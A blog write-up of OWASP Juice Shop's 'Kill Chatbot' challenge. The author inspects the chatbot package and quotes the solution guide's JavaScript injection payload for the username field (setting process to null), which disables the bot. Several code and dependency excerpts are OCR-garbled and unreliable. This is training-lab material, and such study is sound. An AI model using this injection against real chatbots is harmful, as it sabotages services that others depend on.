Hacking OWASP’s Juice Shop Pt. 64: Kill Chatbot


Name:  Kill Chatbot

Description: Permanently disable the support chatbot so that it can no longer answer customer queries.

Difficulty:  5 star

Category: Vulnerable Components

Expanded Description: https://pwning.owasp-juice.shop/part2/vulnerable-components.html

Tools used:


Resources used:

Solution Guide https://pwning.owasp-juice.shop/appendix/solutions.html


The expanded description for this challenge heavily suggests that the vulnerability to exploit has something to do with the code which runs the bot. First thing’s first, I found the package which runs the bot in the application-configuration file, “juicy-chat-bot”.

• Published 14 days ago 
9.6.€ • 
9 Dependencies 
Juicy Chat Bot 
cohe style standard 
Smart, friendly and helpful chat bot for OWASP Juice Shop.

Here I found that there’s a GitHub repository for the package, so I went there and downloaded the package.

Next, I checked out what the dependencies were, thinking there may be a library here which has a known vulnerability to exploit.

"dependencies" : 
vm2" "%.9.2", 
"anlpjs/core-loader": "A4.4.ø 
"anlpjs/evaluator": "A4.4.ø 
"anlpjs/lang-all : "A 
" 4.4.0", 
"anlpjs/language": "A4 3 0 
"Onlpjs/nlp • 
"Onlpjs/nlu • "A 
"anlpjs/request": "A4.4 0 
"onlpjs/sentiment": "A4.4 0 
"devDependencies " : 
nyc". "A15.ø.0", 
"chal : 
"mocha • 
"standard • "A 

Unfortunately there was no such luck. I then spent significant time poring over each file in the GitHub repository, trying to find a way to kill the bot. My lack of JavaScript experience, however, was a serious hindrance to this effort. Having written very, very little JS over the course of my education, I struggled to figure out what the intended solution for this challenge was. I saw the following piece of code and knew it had to have something to do with the solution, but had zero clue how to exploit it.

users = 
(token, name) { 
addUser : 
. idmap[token] = name 
(token) { 
get : 
. idmap[ token] 
return this 
train ( ) { 
trainingset .data { 
query.utterances .map((utterance) { 
model.addDocument(trainingSet.lang, utterance, query .intent) 
query .answers { 
model.addAnswer(trainingSet.lang, query.intent, answer) 
{ training.state = 
process (query, token) { 
(users .get(token)) { 
model .process(trainingset . lang, query) 
{ action: 
' unrecognized' , 
body: 'user does not exist' 

So I went to the Solution Guide and found this string:  admin”); process=null; users.addUser(“1337”, “test

This string inserts JS code into the “username” field which kills the bot, something I’m still trying to wrap my head around.

I'm sorry I didn't get your name. What shall I call you? 
admin"); process—null; users.addUser("1337", "test 
Nice to meet you admin, I'm Juicy 
Oh no... Remember to stay hydrated when I'm gone...
You successfully solved a challenge: Kill Chatbot (Permanently disable the 
support chatbot so that it can no longer answer customer queries.) 

Prevention and Mitigation Strategies:

OWASP Vulnerable Dependency Management Cheat Sheet

Lessons Learned and Things Worth Mentioning: 

JavaScript (and possibly other languages, I haven’t checked yet) allows user inputs to be interpreted as code if the inputs aren’t sanitized properly. This is something entirely new to me, and as I’ve never seen it before I wouldn’t have been able to work it out without the Solution Guide.

Leave a Reply

Fill in your details below or click an icon to log in:

WordPress.com Logo

You are commenting using your WordPress.com account. Log Out /  Change )

Facebook photo

You are commenting using your Facebook account. Log Out /  Change )

Connecting to %s